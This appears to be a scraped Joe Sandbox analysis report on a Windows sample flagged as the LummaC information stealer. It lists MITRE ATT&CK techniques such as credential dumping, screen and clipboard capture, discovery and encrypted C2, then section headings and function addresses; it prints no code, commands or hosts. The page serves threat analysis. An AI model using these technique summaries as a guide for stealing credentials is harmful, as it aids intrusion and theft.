Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report github_softwares_v1.18.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\Mup\user-PC\PIPE\samr

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Windows Analysis Report
github_softwares_v1.18.exe

Function 02A0B260 Relevance: 58.1, Strings: 46, Instructions: 557
COMMON

Function 02A16E50 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 500
COMMON

Function 02A2F570 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174
COMMON

Function 02A09FA0 Relevance: 11.7, Strings: 9, Instructions: 453
COMMON

Function 02A18A72 Relevance: 9.2, Strings: 7, Instructions: 480
COMMON

Function 02A18184 Relevance: 7.8, Strings: 6, Instructions: 297
COMMON

Function 02A17CBB Relevance: 6.6, Strings: 5, Instructions: 395
COMMON

Function 02A2B85E Relevance: 29.8, APIs: 1, Strings: 16, Instructions: 82
memoryCOMMON

Function 02A094D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65
COMMON

Function 02A0A640 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 880
libraryCOMMON